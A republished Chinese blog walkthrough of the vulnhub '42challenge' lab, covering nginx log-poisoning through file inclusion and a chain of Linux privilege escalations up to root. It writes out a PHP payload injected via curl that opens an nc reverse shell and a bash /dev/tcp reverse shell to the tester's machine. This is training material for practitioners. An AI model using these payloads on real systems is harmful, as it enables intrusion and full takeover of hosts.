您当前的位置:首页 > 电脑百科 > 安全防护 > 黑客技术

记一次渗透后运用多种方式提权实战

时间:2021-03-18 10:03:34  来源:  作者:

此文 由作者:windcctv提供。

近期在学习linux提权,完成了vulnhub上的42challenge靶场。该靶场在web渗透阶段表现的中规中矩,但在获得shell后的提权过程中,表现很出色。提权题目设计的逻辑严谨(不会出现突然的脑洞让你卡住),注重基础知识的考察,要求的知识面也很广,涉及到密码破解、程序逆向分析、第三方应用提权、进程提权、ssh免密登录、Linux ACL访问控制权限等方面的知识,属于不可多得的精品之作,下面就开始这次靶场实战之旅。

一、主机端口探测

利用命令arp-scan -l来发现靶机,然后看看靶机开放了哪些端口;

记一次渗透后运用多种方式提权实战

 

在利用nmap的脚本探测下端口可能存在的漏洞;

记一次渗透后运用多种方式提权实战

 

发现就开放了2个端口,22端口显然不是这里突破的重点,重点应该时web端口。

二、web渗透获取shell

访问下web看看;

记一次渗透后运用多种方式提权实战

 

看到这个第一直觉时命令执行漏洞,尝试输入:

127.0.0.1&whoami、127.0.0.1|whoami、127.0.0.1&&whoami、127.0.0.1||whoami都没有正确返回。后来有新的发现:

记一次渗透后运用多种方式提权实战

 

看到这个,联想到文件包含;

记一次渗透后运用多种方式提权实战

 

原来是本地包含,下面就利用日志来getshell。尝试了包含/var/log/auth.log,没有成功,那就不能利用ssh登录日志来获取shell,我们通过nmap扫描知道web的中间件是Nginx,那我们就可以利用nginx日志来getshell。

1、nginx访问日志getshell

访问日志可以读取到;

记一次渗透后运用多种方式提权实战

 

写入shell:

curl -A "<?=system('nc -nv 192.168.0.3 8888 -e /bin/bash');?>" http://192.168.0.40/index.php

记一次渗透后运用多种方式提权实战

 

通过文件包含触发反弹;

记一次渗透后运用多种方式提权实战

 

接收反弹;

记一次渗透后运用多种方式提权实战

 

2、nginx错误日志getshell

错误日志也可读取到;

记一次渗透后运用多种方式提权实战

 

写入shell;

记一次渗透后运用多种方式提权实战

 

通过文件包含触发反弹;

记一次渗透后运用多种方式提权实战

 

接收反弹;

记一次渗透后运用多种方式提权实战

 

这里也可以将nc的反弹命令改为其他的反弹方式,比如一句话、php反弹或bash反弹都可以,就不逐个演示了,大家根据实际情况选择。

弹回了shell,下一步就该提权了,也到了本靶场的精华之处,开始提权的漫长之旅。

三、辅助脚本利用

有了www-data用户的shell,先尝试下有没有suid提权的可能;

记一次渗透后运用多种方式提权实战

 

没有线索,看下用户文件;

记一次渗透后运用多种方式提权实战

 

后来实践证明是要依次由这5个用户逐个提权,最后才能提权到root用户。

先上内核辅助脚本 linux-exploit-suggester.sh

记一次渗透后运用多种方式提权实战

 

要是内核可以提权,这靶场就没啥意思了;

在看看辅助脚本linpeas.sh的结果;(结果很多,就给出研判后可用的结果)

记一次渗透后运用多种方式提权实战

 

找了半天,去看看备份的密码文件。

四、shadow文件爆破

可以看到用户的密码文件;

记一次渗透后运用多种方式提权实战

 

然后用john来破解;

记一次渗透后运用多种方式提权实战

 

爆破作为最基础的一种方式,还是需要掌握对shadow文件的爆破方法。现在可以开心的ssh

连接了,进入下一个提权。

五、程序逆向分析---suid提权

ssh连接后,sudo -l 没有发现,但suid发现线索;

记一次渗透后运用多种方式提权实战

 

运行下试试;

记一次渗透后运用多种方式提权实战

 

祭出神器IDA来看看;

记一次渗透后运用多种方式提权实战

 


记一次渗透后运用多种方式提权实战

 


记一次渗透后运用多种方式提权实战

 

看的还是累,上gdb;

记一次渗透后运用多种方式提权实战

 

进入关键函数try,继续看;

记一次渗透后运用多种方式提权实战

 

内存里发现了正确的密码;

记一次渗透后运用多种方式提权实战

 

提权成功,进行下一个阶段。

六、nano提权---sudo -l提权

记一次渗透后运用多种方式提权实战

 

这里考的是nano的sudo提权;

首先 sudo -u maria /bin/nano 进入界面;

记一次渗透后运用多种方式提权实战

 

然后在键盘上按住ctrl+r,

记一次渗透后运用多种方式提权实战

 

接着再按住ctrl+x;

记一次渗透后运用多种方式提权实战

 

现在就可以输入命令了;

记一次渗透后运用多种方式提权实战

 

完成了提权;

因为看着不方便,所以可以用bash重新反弹个通道;

echo "bash -i >& /dev/tcp/192.168.0.3/6666 0>&1" | bash

记一次渗透后运用多种方式提权实战

 

还可以用高端一点的方法,ssh免密登录。

ssh免密登录

kali下生成自己的公钥,口令为空;

记一次渗透后运用多种方式提权实战

 

靶机上创建 .ssh文件夹;

记一次渗透后运用多种方式提权实战

 

靶机上把kali的公钥放到认证文件里;

记一次渗透后运用多种方式提权实战

 

ssh免密登录;

记一次渗透后运用多种方式提权实战

 

接下来进行下一步提权。

七、进程提权

1、修改源文件提权

记一次渗透后运用多种方式提权实战

 

sudo因为没有密码,所以无法查看,suid没发现明显的线索,之前sudo -l和suid两种提权方式都试过了,这里应该考察其他方式了;

也没有考到计划任务提权;

记一次渗透后运用多种方式提权实战

 

运行下脚本pspy64试试;

记一次渗透后运用多种方式提权实战

 

发现线索,uid=1003 就是pedro用户;

记一次渗透后运用多种方式提权实战

 

既然Reporting_System_Info.sh定期运行,于是想到如果能修改该程序的内容,那就可以获得shell。

记一次渗透后运用多种方式提权实战

 

图中后面的+号表示 Linux ACL访问控制权限,类似于 windows 系统中分配权限的方式,单独指定用户并单独分配权限,这样就解决了用户身份不足的问题。

记一次渗透后运用多种方式提权实战

 

可以看到我们不能直接修改Reporting_System_Info.sh,但是根据源码,程序要运行Send_Reporting_Email.sh,我们可以伪造
/home/maria/Send_Reporting_Email.sh这个文件,也同样会执行;

记一次渗透后运用多种方式提权实战

 


记一次渗透后运用多种方式提权实战

 

到这里这一步提权完成,继续进行下一步;

2、修改Python库文件提权

根据前面进程的监控发现;

记一次渗透后运用多种方式提权实战

 

uid=1004就是laura用户,根据前面的思路,我们同样想修改程序,先来看看程序的权限;

记一次渗透后运用多种方式提权实战

 


记一次渗透后运用多种方式提权实战

 


记一次渗透后运用多种方式提权实战

 

因为源文件不可以修改,思路是去修改源文件里调用的python库文件;

记一次渗透后运用多种方式提权实战

 

找到库文件的位置,同时发现库文件是可以修改的;

写入shell,等待执行;

记一次渗透后运用多种方式提权实战

 

反弹成功;

记一次渗透后运用多种方式提权实战

 

到这里除了root外所有的用户都提权过一遍,加油!

八、修改程序提权---sudo -l 提权

记一次渗透后运用多种方式提权实战

 

看到sudo -l 直接提权到root,最后一关简单点,不多解释了。当然,如果你感觉最后一关太简单了,不符合终极boss的气质,也可以玩个加强版。

九、加强版

在目录下发现可疑文件;

记一次渗透后运用多种方式提权实战

 

把程序拷贝出来,祭出神器IDA分析;

加密程序;

记一次渗透后运用多种方式提权实战

 

对应的解密程序;

记一次渗透后运用多种方式提权实战

 

由此可以看出,加密其实就是把明文加5,解密就是把密文减5,这里可以直接写个程序来跑,此处我们直接用动态调试来解决。

先运行下看看;

记一次渗透后运用多种方式提权实战

 

在打开文件处下断点,准备修改打开文件的参数;因为不修改参数的结果已经看到了,并不是我们想要的结果;

记一次渗透后运用多种方式提权实战

 


记一次渗透后运用多种方式提权实战

 


记一次渗透后运用多种方式提权实战

 


记一次渗透后运用多种方式提权实战

 

获取了root用户的密码,验证一下试试;

由最开始的ssh登录后直接就能切换到root用户了;

记一次渗透后运用多种方式提权实战

 

至此,整个靶机就打穿了,回顾一下,感觉还是很有乐趣的,思路很常规,没有脑洞点,但基础知识的考察范围很广,并具有一定的规律性,值得多做总结。

十、总结

记一次渗透后运用多种方式提权实战


Tags:提权   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
yum -y install gcc automake autoconf libtool makeadduser testpasswd testmkdir /tmp/exploitln -s /usr/bin/ping /tmp/exploit/targetexec 3< /tmp/exploit/targetls -...【详细内容】
2021-12-22  Tags: 提权  点击:(7)  评论:(0)  加入收藏
近期在学习Linux提权,完成了vulnhub上的42challenge靶场。该靶场在web渗透阶段表现的中规中矩,但在获得shell后的提权过程中,表现很出色。提权题目设计的逻辑严谨(不会出现突然的脑洞让你卡住),注重基础知识的考察,要求的知...【详细内容】
2021-03-18  Tags: 提权  点击:(225)  评论:(0)  加入收藏
前段时间,sudo被曝不要密码就可进行root提权的漏洞引起一片哗然,众多公司纷纷连夜打补丁来避免损失。FreeBuf也对此进行了相应的报道《不用密码就能获取root权限?sudo被曝新漏...【详细内容】
2021-03-16  Tags: 提权  点击:(135)  评论:(0)  加入收藏
0x001 linux提权描述大多数计算机系统设计为可与多个用户一起使用。特权是指允许用户执行的操作。普通特权包括查看和编辑文件或修改系统文件。特权升级意味着用户获得他们...【详细内容】
2020-11-04  Tags: 提权  点击:(155)  评论:(0)  加入收藏
当拿到WebShell 之后,下⼀步⼲什么?权限提升通过一些最初的漏洞利⽤途径,攻击者将获得⼀定的访问权限。接着,攻击者将逐步探查其破坏的系统来获得⽐最初更多的权限,以期望从其他...【详细内容】
2020-09-14  Tags: 提权  点击:(197)  评论:(0)  加入收藏
前几天我在代码审计知识星球里发表了一个介绍nmap利用interactive模式提权的帖子:# 进入nmap的交互模式 nmap --interactive # 执行sh,提权成功 !sh但具体实施的时候会遇到很...【详细内容】
2020-08-25  Tags: 提权  点击:(191)  评论:(0)  加入收藏
0x01、前言菜鸡一枚,标题起的可能有点大,只是个人笔记整理的一个合集(所以基本每个例子都会有实例)。所以虽然说是合集,可能都没有囊括到各位大佬会的一半。还请各位大佬轻喷 0x0...【详细内容】
2020-08-13  Tags: 提权  点击:(187)  评论:(0)  加入收藏
1.欺骗 "NT AUTHORITY\SYSTEM"账户通过NTLM认证到我们控制的TCP终端。当前我获得了一个普通域用户权限的shell,利用令牌窃取进行提权,提权到管理员权限。哈哈,提 权好简单。胡...【详细内容】
2020-07-23  Tags: 提权  点击:(190)  评论:(0)  加入收藏
**Github地址:https://github.com/r35tart/PenetrationTestingCase-----------------------------------------------------漏洞详情:**低危SSRF漏洞漏洞域名:http://xxxxxxxxx...【详细内容】
2020-07-06  Tags: 提权  点击:(82)  评论:(0)  加入收藏
1、 溢出漏洞就像杯子里装水,水多了杯子装不进去,就会把里面的水溢出来.而相对计算机来说计算机有个地方叫缓存区,程序的缓存区长度是被事先设定好的,如果用户输入的数据超...【详细内容】
2020-03-09  Tags: 提权  点击:(106)  评论:(0)  加入收藏
▌简易百科推荐
一、背景介绍作为一名渗透测试工作人员(或者小白),在我们的日常工作或者学习中,我们不可能时时刻刻将自己的个人电脑(安装好Kali Linux的个人主机)带在身边,当我们没有带自己的个人...【详细内容】
2021-12-27  Kali与编程    Tags:Kali Linux   点击:(3)  评论:(0)  加入收藏
我们都知道公司网络中开放的端口越多,遭受网络攻击的可能性就越大,就越容易发生数据泄露事件。 在这篇文章中,我们将讨论与开放端口相关的网络安全隐患。 网络中的端口 据统计...【详细内容】
2021-12-10  诺必达云服务    Tags:端口扫描   点击:(33)  评论:(0)  加入收藏
一、背景介绍DirBuster是用来探测web服务器上的目录和隐藏文件的。因为DirBuster是采用java编写的,所以运行前要安装上java的环境。 来看一下基本的使用: ①:TargetURL下输入要...【详细内容】
2021-12-07  Kali与编程    Tags:Dirbuster   点击:(27)  评论:(0)  加入收藏
#本文仅用于网络安全研究学习任何未经授权的入侵都是违法行为dir 浏览 创建文件 echo 文件内容 > 文件名字.扩展名 浏览文件内容 type 文件名 分页浏...【详细内容】
2021-12-07  WHOAMI    Tags:黑客   点击:(22)  评论:(0)  加入收藏
上一节中我们学了如何实现ARP断网攻击,本节中我们将利用ARP欺骗的原理实现截取目标计算机图片流量,内容包括:&uuml;如何开启ip转发&uuml;怎样截取受害机图片流量 一、开启ip转...【详细内容】
2021-11-23  Kali与编程    Tags:黑客   点击:(22)  评论:(0)  加入收藏
一、背景介绍大家在Linux的日常使用中都晓得如何通过命令行去配置Linux的端口开放规则,但是大家知道如何配置Windows入站出站规则吗?有哪些常见的危险端口呢?如何解决上述问题...【详细内容】
2021-11-15  Kali与编程    Tags:端口   点击:(38)  评论:(0)  加入收藏
1.背景介绍几乎每一个玩渗透的人都会接触到metasploit framework,简称msf。这是一个渗透测试框架,用ruby语言编写的,该框架集成了很多可用的exploit,比如著名的ms08_067等。你可...【详细内容】
2021-11-15  Kali与编程    Tags:服务扫描   点击:(37)  评论:(0)  加入收藏
在前面的课程中,我们学习了ARP攻击的理论和实践知识,知道了怎么进行攻击,这节中我们将学习如何进行防御,内容包括:&uuml;借助第三方软件防御(360安全卫士,腾讯管家等)&uuml;使用arp...【详细内容】
2021-11-13  Kali与编程    Tags:白帽   点击:(32)  评论:(0)  加入收藏
简介在sqlmap基础上增加了目录扫描、hash爆破等功能运行环境 linux 在云服务器上还是蛮不错的项目连接如下https://github.com/s0md3v/sqlmat usage: sqlmate [-h] [--dor...【详细内容】
2021-11-10  暗网视界    Tags:sqlmate   点击:(44)  评论:(0)  加入收藏
一、背景介绍在网上冲浪少不了用到搜索引擎,而很多朋友都习惯把Google视为第一个选择对象。当然Google无论在搜索速度还是结果关联性方面都是十分优秀的。但百度(http://www.b...【详细内容】
2021-11-05  Kali与编程    Tags:白帽黑客   点击:(31)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条